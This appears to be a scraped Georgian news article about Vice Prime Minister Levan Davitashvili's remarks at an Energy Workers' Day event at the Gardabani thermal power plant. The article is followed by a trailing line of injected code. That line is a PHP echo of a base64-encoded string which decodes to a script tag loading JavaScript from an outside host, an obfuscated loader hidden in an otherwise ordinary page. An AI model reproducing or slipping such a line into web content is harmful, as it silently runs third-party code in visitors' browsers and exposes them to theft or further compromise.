celsiusi
ავერსი საქკაბელი
ელექტროენერგიის წარმოება და ენერგეტიკის სფერო უმნიშვნელოვანეს როლს ასრულებს საქართველოს ეკონომიკის განვითარებაში – ეკონომიკის ყველა დარგი პირდაპირ არის დაკავშირებული ენერგეტიკის სფეროს წარმატებასთან, – განაცხადა ვიცე-პრემიერმა, ეკონომიკისა და მდგრადი განვითარების მინისტრმა, ლევან დავითაშვილმა დღეს ენერგეტიკოსის დღისადმი მიძღვნილ ღონისძიებაზე. ამის შესახებ ინფორმაციას ეკონომიკის სამინისტრო ავრცელებს.
 
"იმ შემთხვევაში, როდესაც ჩვენ ვსაუბრობთ საქართველოს ეკონომიკის ამბიციურ გეგმებზე, მიღწევებზე, შედეგებსა და ამოცანებზე, ეს ყველაფერი პირდაპირ უკავშირდება წარმატებულ ენერგეტიკულ დარგს, რადგან ყველა დარგი პირდაპირ კავშირშია ენერგეტიკის სფეროსთან," – განაცხადა დავითაშვილმა.
 
ენერგეტიკოსთა პროფესიული დღე საქართველოში უკვე ოცი წელია, ყოველი წლის 10 სექტემბერს აღინიშნება. წელს ენერგეტიკოსთა დღე „გარდაბანი თბოსადგური – 2“ -ის ტერიტორიაზე გაიმართა. ენერგეტიკოსთა დღეს დარგის წარმომადგენლები დაესწრნენ.
 
ვიცე-პრემიერმა ენერგეტიკოსებს პროფესიული დღე მიულოცა და მადლობა გადაუხადა როგორც ენერგეტიკის სფეროში, ისე მთლიანად ქვეყნის ეკონომიკის განვითარებაში შეტანილი წვლილისთვის.
 
„ჩვენ ქვეყნის განვითარების და ტრანსფორმაციის ძალიან მნიშვნელოვან ეტაპზე და ეპოქაში ვიმყოფებით, საქართველოს ახალი ისტორიაც ასე იწყებოდა მე-19 საუკუნეში, როდესაც ერის მამამ, ილია ჭავჭავაძემ ქვეყნის განვითარება დაუკავშირა ტექნოლოგიების შემოტანას და მათ შორის, პირველი ელექტროსადგური სწორედ მისი ინიციატივით აშენდა თბილისში. ენერგეტიკის წარმატებული განვითარება არანაკლებ მნიშვნელოვანია 21-ე საუკუნეშიც. ჩვენ დღეს ვსაუბრობთ ახალ ერაზე, ციფრულ ტრანსფორმაციაზე, ინოვაციებსა და ტექნოლოგიებზე და ამ კუთხით, რა თქმა უნდა, ისევ და ისევ აქტუალური რჩება ქვეყანაში კონკურენტუნარიანი ელექტროენერგიის წარმოების და მთლიანად სექტორის განვითარება. ვფიქრობთ, რომ ბოლო ათწლეული იყო ამ მხრივ განსაკუთრებით გამორჩეული. ჩვენ არაერთი გამორჩეული ენერგეტიკული პროექტი განვახორციელეთ. ეს უკავშირდება როგორც მდგრად, განახლებად ენერგეტიკულ პროექტებს, ისე ისეთ თანამედროვე პროექტს, როგორიც გარდაბნის თბოელექტროსადგურია. ვფიქრობ, მომავალში ჩვენ კიდევ არაერთ მნიშვნელოვან პროექტს განვახორციელებთ – თქვენთან ერთად, თქვენი პროფესიონალიზმის გარეშე ჩვენს გეგმებზე ლაპარაკი ზედმეტია,“ – განაცხადა ვიცე-პრემიერმა.
 
ენერგეტიკოსის დღისადმი მიძღვნილ ღონისძიებაზე დარგში მიმდინარე და დაგეგმილ ღონისძიებებსა და პროექტებზე პრეზენტაცია გააკეთა მინისტრის მოადგილემ რომეო მიქაუტაძემ ისაუბრა. მან დამსწრე საზოგადოებას საქართველოს ენერგეტიკის სექტორში არსებული სურათი, მიმდინარე და დაგეგმილი რეფორმები და მთლიანად ქვეყნის ენერგოსექტორის განვითარების სტრატეგია გააცნო.
 
ტრადიციულად, ღონისძიების ერთ-ერთი მთავარი ნაწილი ღვაწლმოსილი და ვეტერანი ენერგეტიკოსების დაჯილდოება იყო – მათ საპატიო სიგელები გადაეცათ.
 
 
 
 
449
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");